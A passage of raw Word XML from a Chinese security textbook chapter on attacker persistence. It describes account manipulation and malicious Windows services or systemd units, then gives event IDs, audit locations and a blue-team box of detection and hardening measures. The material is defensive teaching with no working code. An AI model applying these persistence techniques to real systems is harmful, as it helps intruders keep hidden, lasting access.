        <w:t xml:space="preserve">票据（见第16.2节），以期在票据有效期内反复使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">留下的痕迹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：账户创建和修改事件必然在安全日志中留下明确记录。Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统中，关键事件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包括：4720（用户账户创建）、4738（用户账户修改）、4732（成员被添加至安全启用的本地组）。Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/group</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件的修改时间戳和内容变化是核心检测依据。蓝队应将这些关键日志接入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM，并对发生在非变更窗口内的账户操纵行为设置高优先级告警。同时，定期比对抗系统账户列表与组织资产清单是发现“幽灵账户”的有效手段。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="318"/>
    <w:bookmarkStart w:id="319" w:name="利用系统服务与驱动程序"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（4）利用系统服务与驱动程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作系统中，服务（Service）是一类在后台运行、且通常在系统启动时即可自动启动的可执行程序。攻击者如果拥有管理员权限，即可创建新的恶意服务，或修改现有服务的二进制路径（ImagePath）指向恶意载荷③。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，systemd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务单元文件的创建或修改具有类似的持久化效果。这种驻留手段的权限等级高，且较为隐蔽，因为服务通常在用户登录之前就已开始运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">留下的痕迹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务创建会产生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4697（安全审计）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sysmon EID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">13（注册表值修改，针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HKLM\System\CurrentControlSet\Services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。服务配置的静态审计可以通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sc query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-Service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等命令执行，但注意正常服务的变更基线②。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统中，对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/systemd/system/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/systemd/system/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的监控，尤其是新出现的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件，是检测的关键。此外，任何非微软签名的服务二进制文件在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">System32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录外运行，都应触发审查。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="319"/>
    <w:bookmarkEnd w:id="320"/>
    <w:bookmarkStart w:id="321" w:name="防御对照框蓝队检测与消除策略"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">18.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：蓝队检测与消除策略</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对上述所有持久化思路，必须采取纵深防御与持续检测相结合的策略。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">任何单一的检测手段都难以覆盖全部持久化技术，蓝队需要构建一个多层次、互补的检测体系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，这在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mitigations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detections </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部分均有详尽的组织级指引。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（1）自启动项与启动配置的审计与加固</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：部署文件完整性监控（FIM）于所有已知的系统和用户启动目录。创建并维护一份授权的自启动程序白名单，任何新增、修改或删除事件均实时告警。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统，利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sysinternals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具集中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Autoruns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的输出，结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sysmon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行持续监控（EID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">11，文件创建）。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auditd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.config/autostart/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/xdg/autostart/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等目录设置审计规则。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御与修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过组策略（GPO）或配置管理工具（Ansible,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Puppet）强制执行统一的启动项配置，禁止非特权用户修改系统级启动配置。一旦确认恶意持久化，应立即删除相关文件或注册表项，并在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中回溯告警时间窗口，排查攻击者是否同时修改了其他持久化点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（2）计划任务与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">作业的监控与基线管理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统，重点监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">schtasks.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的进程创建事件、计划任务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置文件的修改，以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">106（任务注册）、EID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">140（任务更新）、EID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">141（任务删除）。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统中，监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">守护进程日志及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令的使用。所有新出现的、非管理维护窗口内创建的计划任务，必须被标记。可基于任务名称、执行路径、触发条件中的命令行参数建立异常检测模型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御与修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：实施最小权限原则，限制能够创建或修改计划任务的用户组。定期审查所有活跃的计划任务列表，与已知的基线进行比对，移除不明任务。在生产环境中，可以考虑使用集中化的任务调度平台替代分散的本地</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或任务计划。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（3）账户和认证源完整性监控</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1191"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将来自域控制器（DC）或本地安全授权（LSA）的所有账户管理日志实时转发至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM。关键告警规则包括：非正常时间段创建/启用账户、高权限组（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Domain Admins, Administrators, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sudoers）的成员变动、以及同一账户在短时间内的多次失败认证后突然成功。借助</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UEBA（用户实体行为分析）工具，可以进一步检测出偏离个人基线的异常账户行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1191"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御与修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：严格执行特权访问管理（PAM）和即时（JIT）权限授予，消除常设的高权限账户。定期进行账户访问权限审阅（Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Review）。若发现恶意账户，在禁用或删除账户后，必须重置该账户访问过的所有系统的凭据，并回溯日志以查明此账户被用于访问了哪些敏感资源（横向移动痕迹，详见18.1节）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（4）服务、驱动与内核级持久化防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境中，监控注册表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HKLM\System\CurrentControlSet\Services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下的键值创建和修改，并关联</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sysmon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的驱动程序加载事件（EID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">6）。任何新服务的出现，都必须与服务所有者及部署流程进行确认。Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境中，监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">单元文件的变更，并对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">modprobe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及内核模块加载日志进行审计。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御与修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：实施应用程序白名单（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AppLocker, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WDAC），限制非授权路径下的可执行文件、DLL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和驱动程序的加载。利用安全启动（Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Boot）和内核模块签名机制防止未签名驱动被加载。对发现的恶意服务，除了停止和禁用该服务外，还必须彻底分析该服务加载的恶意载荷（通常在磁盘上），进行全盘扫描以防遗留下备用载荷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（5）通用纵深防御原则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：所有持久化技术几乎都依赖于攻击者获得了过高的权限。严格执行最小权限原则，并限制用户对关键系统区域的写入和执行权限，是遏制持久化部署的最有效屏障。</w:t>
      </w:r>
    </w:p>
    <w:p>
